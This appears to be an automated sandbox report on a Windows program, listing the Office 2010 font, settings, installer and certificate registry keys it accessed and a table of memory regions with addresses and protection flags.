HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\756E6
756E6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\756E6
756E6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
ZoomApp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\InProgress
NULL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
There are 500 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1932F57D000
heap
page read and write
1932FA02000
heap
page read and write
43F257E000
stack
page read and write
7FF6BAC4E000
unkown
page readonly
1932F595000
heap
page read and write
22998D70000
heap
page read and write
2A810EA0000
heap
page read and write
2036F08E000
heap
page read and write
219EE713000
heap
page read and write
219E9700000
heap
page read and write
9F0000
heap
page read and write
922BC7B000
stack
page read and write
219EE290000
trusted library allocation
page read and write
219EE4F0000
trusted library allocation
page read and write
1932F58E000
heap
page read and write
2036F058000
heap
page read and write
219E8EFB000
heap
page read and write
30E0000
heap
page read and write
922BF7E000
stack
page read and write
32C0000
heap
page read and write
102D000
stack
page read and write
219EE220000
trusted library allocation
page read and write
31FE000
stack
page read and write
1A9D11B0000
heap
page read and write
1030000
unkown
page readonly
2F5E000
heap
page read and write
247B4E10000
heap
page read and write
1932EA4B000
heap
page read and write
1932F57E000
heap
page read and write
25913C62000
heap
page read and write
B61B57E000
stack
page read and write
43F22FE000
stack
page read and write
1932F584000
heap
page read and write
22644910000
heap
page read and write
2F59000
heap
page read and write
B61B7FF000
stack
page read and write
25913B40000
heap
page read and write
2B662FE000
stack
page read and write
1C8E5725000
heap
page read and write
1932F58B000
heap
page read and write
1040000
unkown
page readonly
1932F57E000
heap
page read and write
2F30000
heap
page read and write
1932EB13000
heap
page read and write
219E9702000
heap
page read and write
25913BF0000
trusted library allocation
page read and write
1932F584000
heap
page read and write
2036F002000
heap
page read and write
2D4E000
stack
page read and write
1A9D1308000
heap
page read and write
219EE3F0000
trusted library allocation
page read and write
2036F802000
trusted library allocation
page read and write
B61B97B000
stack
page read and write
1932F578000
heap
page read and write
1932EA8D000
heap
page read and write
247B5028000
heap
page read and write
2F5E000
heap
page read and write
2F6F000
heap
page read and write
1932F5B6000
heap
page read and write
2A810F24000
heap
page read and write
22998DD0000
heap
page read and write
7FF6BAC41000
unkown
page execute read
2036F102000
heap
page read and write
7ABC1FE000
stack
page read and write
1932F583000
heap
page read and write
2F66000
heap
page read and write
25913EC0000
trusted library allocation
page read and write
2EE0000
remote allocation
page read and write
22998E00000
heap
page read and write
1932F58B000
heap
page read and write
2F66000
heap
page read and write
1932F58B000
heap
page read and write
2F67000
heap
page read and write
C80000
remote allocation
page read and write
25913A10000
trusted library allocation
page read and write
1A9D1302000
heap
page read and write
1932F57F000
heap
page read and write
247B5002000
heap
page read and write
1932F584000
heap
page read and write
2A810F40000
heap
page read and write
3250000
trusted library allocation
page read and write
25913C60000
heap
page read and write
1932F5A7000
heap
page read and write
1932EA13000
heap
page read and write
2F6F000
heap
page read and write
22644958000
heap
page read and write
1932F57F000
heap
page read and write
2F76000
heap
page read and write
22998F08000
heap
page read and write
1932EAD3000
heap
page read and write
CC0000
remote allocation
page read and write
43F1FAB000
stack
page read and write
1932FA1B000
heap
page read and write
7FF6BAC40000
unkown
page readonly
7ABC67E000
unkown
page read and write
2F66000
heap
page read and write
219E9718000
heap
page read and write
1932EA5A000
heap
page read and write
1932F5CE000
heap
page read and write
32C5000
heap
page read and write
1932F580000
heap
page read and write
38C2000
trusted library allocation
page read and write
81D6B7B000
stack
page read and write
22644810000
remote allocation
page read and write
1A9D1252000
heap
page read and write
219E95D0000
trusted library section
page readonly
D9A1EF9000
stack
page read and write
219E8F13000
heap
page read and write
2F60000
heap
page read and write
25913EE0000
trusted library allocation
page read and write
C80000
remote allocation
page read and write
219EA210000
trusted library allocation
page read and write
219E8E56000
heap
page read and write
25914AA0000
heap
page readonly
219EE210000
trusted library allocation
page read and write
1932EA29000
heap
page read and write
25913C60000
heap
page read and write
219EE3BE000
trusted library allocation
page read and write
219E9602000
heap
page read and write
25913B60000
heap
page read and write
25913ED5000
heap
page read and write
1932F57F000
heap
page read and write
1932F590000
heap
page read and write
1932F584000
heap
page read and write
31C0000
heap
page read and write
2DE0000
heap
page read and write
1932F57F000
heap
page read and write
219EE6AF000
heap
page read and write
1932EAB3000
heap
page read and write
1932F551000
heap
page read and write
22998E13000
heap
page read and write
1932EA4D000
heap
page read and write
81D687B000
stack
page read and write
1932F595000
heap
page read and write
1932EAC8000
heap
page read and write
1932F579000
heap
page read and write
25913BD0000
trusted library allocation
page read and write
2F50000
heap
page read and write
22644970000
heap
page read and write
2B6657F000
stack
page read and write
1C8E549E000
heap
page read and write
38A1000
trusted library allocation
page read and write
1932F5A3000
heap
page read and write
2A810F16000
heap
page read and write
388F000
stack
page read and write
1932F58B000
heap
page read and write
306E000
stack
page read and write
2A810F26000
heap
page read and write
1A9D1276000
heap
page read and write
2A810D50000
heap
page read and write
219E9713000
heap
page read and write
219EE2A0000
trusted library allocation
page read and write
303D000
stack
page read and write
1932F57F000
heap
page read and write
1932FA1B000
heap
page read and write
2BF0000
heap
page read and write
7FF6BAC4C000
unkown
page write copy
219EE3B8000
trusted library allocation
page read and write
7FF6BAC49000
unkown
page readonly
1050000
unkown
page read and write
1932F59D000
heap
page read and write
1932F57F000
heap
page read and write
1932F57F000
heap
page read and write
1932EA00000
heap
page read and write
2036F000000
heap
page read and write
219EE70B000
heap
page read and write
247B5102000
heap
page read and write
7FF6BAC4E000
unkown
page readonly
1A9D1150000
heap
page read and write
43F2677000
stack
page read and write
1932F58B000
heap
page read and write
2F5A000
heap
page read and write
31C2000
heap
page read and write
36B0000
heap
page read and write
2036F100000
heap
page read and write
25913C10000
heap
page read and write
2A810F30000
heap
page read and write
219E8E13000
heap
page read and write
A5FFAFF000
stack
page read and write
1932F58E000
heap
page read and write
2F50000
heap
page read and write
D9A1E79000
stack
page read and write
81D6EFE000
stack
page read and write
C9C000
stack
page read and write
922BE7B000
stack
page read and write
1932F57E000
heap
page read and write
1932EA57000
heap
page read and write
2B65FFB000
stack
page read and write
2A810F41000
heap
page read and write
1932F565000
heap
page read and write
1932F58C000
heap
page read and write
2036F04C000
heap
page read and write
1932F580000
heap
page read and write
2F6F000
heap
page read and write
1A9D1313000
heap
page read and write
219E8C10000
heap
page read and write
1932E920000
heap
page read and write
25913ED0000
heap
page read and write
247B5013000
heap
page read and write
25913C18000
heap
page read and write
CC0000
remote allocation
page read and write
B61B2FE000
stack
page read and write
2B6677E000
stack
page read and write
30D0000
trusted library allocation
page read and write
2EE0000
remote allocation
page read and write
2F6E000
heap
page read and write
FDA947E000
stack
page read and write
B61ABAB000
stack
page read and write
2264496D000
heap
page read and write
1932F584000
heap
page read and write
43F227E000
stack
page read and write
1932F59F000
heap
page read and write
1040000
unkown
page readonly
1C8E5380000
heap
page read and write
F2073F8000
stack
page read and write
1C8E549B000
heap
page read and write
219E8E9E000
heap
page read and write
219EE649000
heap
page read and write
1932F57F000
heap
page read and write
219EE3E0000
trusted library allocation
page read and write
219E8E8A000
heap
page read and write
7FF6BAC49000
unkown
page readonly
1932F58E000
heap
page read and write
2F66000
heap
page read and write
219E9758000
heap
page read and write
2036F071000
heap
page read and write
2B6687D000
stack
page read and write
1932F5A6000
heap
page read and write
219E95E0000
trusted library section
page readonly
1932F57E000
heap
page read and write
22998D60000
heap
page read and write
FC0000
heap
page read and write
219E8F02000
heap
page read and write
1C8E5490000
heap
page read and write
1932F57F000
heap
page read and write
219E8E58000
heap
page read and write
1932F576000
heap
page read and write
81D697D000
stack
page read and write
4DF0000
trusted library allocation
page read and write
219E9718000
heap
page read and write
1932F2E0000
remote allocation
page read and write
B61B3FB000
stack
page read and write
307E000
stack
page read and write
25914AB0000
trusted library allocation
page read and write
2B6627E000
stack
page read and write
219EE65F000
heap
page read and write
1932F2E0000
remote allocation
page read and write
219EE63C000
heap
page read and write
1932F57F000
heap
page read and write
1932F5B2000
heap
page read and write
81D6BFF000
stack
page read and write
2B664FB000
stack
page read and write
219EA200000
trusted library allocation
page read and write
219E8BB0000
heap
page read and write
1932F5B2000
heap
page read and write
BB0000
heap
page read and write
1932F57F000
heap
page read and write
25913BE0000
trusted library allocation
page read and write
1932EA4F000
heap
page read and write
1932F5AE000
heap
page read and write
7FF6BAC41000
unkown
page execute read
247B4E20000
heap
page read and write
219EE61E000
heap
page read and write
7ABC07E000
stack
page read and write
22998E02000
heap
page read and write
1932FA02000
heap
page read and write
247B506F000
heap
page read and write
2F37000
heap
page read and write
1932F5A9000
heap
page read and write
219E95F0000
trusted library section
page readonly
219EE6E6000
heap
page read and write
2F66000
heap
page read and write
2D90000
trusted library allocation
page read and write
1932F583000
heap
page read and write
1932F57C000
heap
page read and write
F20757C000
stack
page read and write
81D68FE000
stack
page read and write
219E8E29000
heap
page read and write
219EF000000
heap
page read and write
2F20000
trusted library allocation
page read and write
22999670000
trusted library allocation
page read and write
31C0000
heap
page read and write
219EA203000
trusted library allocation
page read and write
219EE6EC000
heap
page read and write
